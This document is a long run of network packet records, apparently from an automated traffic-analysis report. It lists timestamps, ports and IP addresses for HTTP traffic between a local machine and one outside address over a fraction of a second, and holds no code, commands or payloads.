                                    Aug 29, 2024 12:02:37.106074095 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.106076956 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.106090069 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.106100082 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.106115103 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.106128931 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.106141090 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.106141090 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.106152058 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.106167078 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.106178045 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.106193066 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.106353998 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.106364965 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.106375933 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.106386900 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.106388092 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.106399059 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.106404066 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.106411934 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.106422901 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.106425047 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.106436014 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.106451035 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.106472969 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.106492996 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.106503963 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.106513977 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.106524944 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.106524944 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.106538057 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.106550932 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.106554031 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.106565952 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.106575012 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.106607914 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.106765985 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.106775999 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.106786966 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.106800079 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.106803894 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.106811047 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.106820107 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.106822968 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.106838942 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.106843948 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.106852055 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.106873035 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.106892109 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.106897116 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.106903076 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.106914043 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.106933117 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.106944084 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.107101917 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.107111931 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.107126951 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.107136011 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.107140064 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.107151031 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.107157946 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.107162952 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.107173920 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.107183933 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.107187033 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.107199907 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.107211113 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.107213020 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.107230902 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.107239008 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.107268095 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.107351065 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.107362986 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.107376099 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.107381105 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.107388973 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.107400894 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.107400894 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.107414007 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.107415915 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.107424021 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.107434988 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.107436895 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.107476950 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.107492924 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.107595921 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.107606888 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.107620955 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.107626915 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.107631922 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.107641935 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.107665062 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.107677937 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.107712984 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.107722998 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.107733965 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.107747078 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.107748032 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.107762098 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.107762098 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.107774973 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.107784986 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.107793093 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.107820034 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.107824087 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.107831955 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.107841969 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.107856035 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.107863903 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.107867956 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.107877970 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.107880116 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.107892990 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.107904911 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.107906103 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.107933998 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.108087063 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.108122110 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.108135939 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.108149052 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.108158112 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.108170033 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.108186007 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.108309031 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.108319998 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.108330011 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.108341932 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.108350039 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.108355045 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.108374119 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.108374119 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.108386993 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.108393908 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.108426094 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.142724037 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.142740011 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.142757893 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.142776012 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.142790079 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.142808914 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.142819881 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.142822981 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.142833948 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.142875910 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.142883062 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.195722103 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.195753098 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.195766926 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.195779085 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.195791006 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.195844889 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.195842981 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.195857048 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.195884943 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.195909977 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.195920944 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.195921898 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.195933104 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.195941925 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.195945024 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.195971966 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.195997000 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.196011066 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.196050882 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.196079969 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.196090937 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.196101904 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.196113110 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.196120024 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.196124077 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.196152925 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.196234941 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.196245909 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.196264029 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.196268082 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.196274996 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.196286917 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.196295023 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.196324110 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.196475983 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.196496964 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.196508884 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.196513891 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.196520090 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.196532965 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.196541071 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.196543932 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.196559906 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.196569920 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.196572065 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.196583986 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.196590900 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.196594954 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.196607113 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.196613073 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.196649075 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.196685076 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.196696997 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.196708918 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.196717978 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.196721077 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.196743011 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.196767092 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.196855068 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.196866989 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.196877003 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.196893930 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.196897030 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.196906090 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.196923018 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.196954012 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.196980953 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.196995974 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.197006941 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.197016954 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.197021008 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.197032928 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.197036982 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.197042942 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.197055101 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.197066069 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.197083950 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.197087049 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.197139025 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.197139025 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.197177887 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.197201014 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.197212934 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.197222948 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.197237968 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.197257042 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.197316885 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.197329998 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.197340965 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.197350979 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.197351933 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.197362900 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.197374105 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.197380066 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.197407961 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.197490931 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.197505951 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.197515965 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.197525024 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.197526932 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.197537899 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.197549105 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.197554111 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.197593927 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.197613955 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.197623968 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.197635889 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.197648048 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.197654009 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.197669029 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.197679996 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.197686911 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.197700024 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.197720051 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.197752953 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.197772026 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.197783947 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.197794914 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.197796106 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.197819948 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.197839022 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.197860956 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.197871923 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.197881937 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.197890997 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.197894096 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.197905064 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.197920084 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.197932959 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.197935104 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.197957039 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.197957039 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.197979927 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.198122978 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.198133945 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.198144913 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.198156118 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.198157072 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.198175907 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.198200941 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.198276997 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.198287010 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.198292971 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.198301077 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.198307037 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.198318005 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.198319912 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.198335886 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.198347092 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.198348045 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.198359013 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.198364019 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.198370934 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.198385954 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.198410034 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.198556900 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.198568106 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.198579073 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.198590994 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.198601961 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.198605061 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.198616028 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.198618889 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.198627949 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.198637962 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.198648930 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.198652029 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.198683977 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.198818922 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.198831081 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.198842049 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.198853016 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.198860884 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.198865891 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.198878050 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.198879957 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.198890924 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.198900938 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.198911905 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.198930979 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.233270884 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.233287096 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.233302116 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.233334064 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.233350992 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.233362913 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.233369112 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.233375072 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.233388901 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.233419895 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.233441114 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.286659956 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.286708117 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.286732912 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.286763906 CEST8049717172.67.128.117192.168.2.6
